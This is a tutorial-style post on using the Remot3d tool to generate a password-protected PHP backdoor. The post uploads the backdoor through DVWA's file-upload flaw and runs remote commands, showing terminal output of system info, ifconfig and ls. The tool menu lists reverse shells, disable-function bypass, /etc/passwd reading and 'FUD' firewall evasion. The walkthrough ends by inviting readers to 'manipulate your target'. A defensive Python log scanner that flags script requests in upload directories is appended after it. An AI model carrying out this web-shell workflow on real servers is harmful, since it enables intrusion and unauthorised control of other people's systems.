Build your own PHP Remote Backdoor

ATTACKER :-

Remot3d Installation :-

[Remot3d ASCII-art banner]
--------------------------------------
PHP REMOTE BACKDOOR - BY B1P0L4R
[+] Options : 
└[-] 1. Generate Backdoor
└[-] 2. Generate Reverser Shell (with iMap Disable Function Bypass)
└[-] 3. Bypass Read /etc/passwd (with unique logic)
└[-] 4. Remote your Backdoor (Just for Option 1)
┌[+] Choose the options
└[root@indoxploit]:#
  • The options above are used to create backdoors.
  • Type 1
┌[+] Choose the options
└[root@indoxploit]:~# 1
[Remot3d ASCII-art banner] Version 2.0 - Stable
[+] Set Your Backdoor Name : backdoor.pbp
  • Then enter the backdoor name: backdoor.php
  • Then enter the password: 123456
[+] Set Your Backdoor Password : 123456 
└[-] Success Generating Backdoor on /home/user/Downloads/Remot3d/backdoor.pbp
  • The backdoor is saved in the current Remot3d directory.
  • This backdoor.php now has to be uploaded to a vulnerable server, which in our case is DVWA. We will use the upload vulnerability in DVWA to upload this backdoor.php.
  • To test uploading the backdoor in DVWA, open DVWA in a browser by going to 192.168.1.105. Enter username: admin and password: password
  • After opening DVWA, click Upload. Then browse to the Remot3d location and select the backdoor.php file.
  • After uploading the file, go to the terminal and type ./Remot3d
  • Type 4
[+] Options : 
└[•] 1. Generate Remote Backdoor
└[•] 2. Generate Reverser Shell (with iMap Disable Function Bypass)
└[•] 3. Bypass Server Firewall (with FUD Backdoor Script)
└[•] 4. Remote your Backdoor (Just for Option 1)
┌[+] Choose the options
└[root@indoxploit]:~# 4
[ ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ ]
[!] Backdoor Alive… Processing for Connect
[+] Your Public IP : 47.5.27.25
[+] System Info :
Notice: Undefined index: pwd in /opt/lampp/htdocs/hackable/uploads/backdoor3.php on line 1
Linux dvwa #41-Ubuntu SMP Thu Aug 19 01:12:52 UTC 2010 i686 unknown GNU/Linux
[+] User ID :
Notice: Undefined index: pwd in /opt/lampp/htdocs/hackable/uploads/backdoor3.php on line 1
uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)
[ +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ ]
[+] COMMAND : ifconfig
Notice: Undefined index: pwd in /opt/lampp/htdocs/hackable/uploads/backdoor3.php on line 1
eth0 Link encap:Ethernet HWaddr 00:0c:29:33:5d:c2
     inet addr:192.168.1.105 Bcast:192.168.1.255 Mask:255.255.255.0
     inet6 addr: fe80::20c:29ff:fe33:5dc2/64 Scope:Link
     UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
     RX packets:1035 errors:0 dropped:0 overruns:0 frame:0
     TX packets:383 errors:0 dropped:0 overruns:0 carrier:0
     collisions:0 txqueuelen:1000
     RX bytes:106710 (106.7 KB) TX bytes:267977 (267.9 KB)
lo   Link encap:Local Loopback
     inet addr:127.0.0.1 Mask:255.0.0.0
     inet6 addr: ::1/128 Scope:Host
     UP LOOPBACK RUNNING MTU:16436 Metric:1
     RX packets:68 errors:0 dropped:0 overruns:0 frame:0
     TX packets:68 errors:0 dropped:0 overruns:0 carrier:0
     collisions:0 txqueuelen:0
     RX bytes:5440 (5.4 KB) TX bytes:5440 (5.4 KB)
  • Typing ls displays the current files on the server.
[+] COMMAND : ls
Notice: Undefined index: pwd in /opt/lampp/htdocs/hackable/uploads/backdoor3.php on line 1
backdoor
backdoor2
backdoor3.php
backdoor4.php
dvwa_email.png
test
  • Now you can manipulate your target, if the target has the above vulnerability.
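
A defender-side check for the activity shown above, as an added example that is not part of the original post or of Remot3d: it scans Apache access-log lines for requests that reach script-like files under the upload directory. The /hackable/uploads/ URL prefix (inferred from the filesystem path in the output above), the extension list, and the sample log lines are assumptions constructed for illustration; the check goes beyond plain .php names to cover double extensions and percent-encoded names.

```python
import posixpath
import re
from collections import defaultdict
from urllib.parse import unquote

# Assumption: URL prefix of the upload directory, inferred from the path above.
UPLOAD_PREFIX = "/hackable/uploads/"
# Assumed list of extensions mapped to the PHP handler; adjust per server.
SCRIPT_EXT = re.compile(r"\.(php\d?|phtml|phar|pht)(\.|$)", re.IGNORECASE)
# Apache common/combined log format: client, timestamp, request line, status.
LOG_LINE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)

# Constructed sample log lines (documentation-range client addresses).
SAMPLE_LOG = [
    '198.51.100.20 - - [10/Jan/2024:10:00:00 +0000] "GET /index.php HTTP/1.1" 200 4821',
    '203.0.113.7 - - [10/Jan/2024:10:00:09 +0000] "POST /hackable/uploads/backdoor3.php HTTP/1.1" 200 312',
    '203.0.113.7 - - [10/Jan/2024:10:00:15 +0000] "POST /hackable/uploads/backdoor3.php HTTP/1.1" 200 1290',
    '198.51.100.20 - - [10/Jan/2024:10:01:00 +0000] "GET /hackable/uploads/dvwa_email.png HTTP/1.1" 200 667',
    '198.51.100.20 - - [10/Jan/2024:10:02:00 +0000] "GET /hackable/uploads/x.%70hp.jpg?a=1 HTTP/1.1" 404 210',
]

def find_upload_script_hits(lines, prefix=UPLOAD_PREFIX):
    """Return {(client, path): {"count", "methods", "statuses"}} for requests
    that target a script-like file inside the upload directory."""
    hits = defaultdict(lambda: {"count": 0, "methods": set(), "statuses": set()})
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue  # skip malformed or non-request lines
        # Drop the query string, decode %xx, and collapse ./ and ../ segments
        # so encoded or padded paths compare against the prefix correctly.
        raw_path = m["target"].split("?", 1)[0]
        path = posixpath.normpath(unquote(raw_path))
        name = path.rsplit("/", 1)[-1]
        if path.startswith(prefix) and SCRIPT_EXT.search(name):
            hit = hits[(m["client"], path)]
            hit["count"] += 1
            hit["methods"].add(m["method"])
            hit["statuses"].add(int(m["status"]))
    return dict(hits)

if __name__ == "__main__":
    for (client, path), info in find_upload_script_hits(SAMPLE_LOG).items():
        print(client, path, info["count"], sorted(info["methods"]), sorted(info["statuses"]))
```

A 200 status on such a request means the server handed the uploaded file to the interpreter or served it; either way the upload directory should not contain or execute script files.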
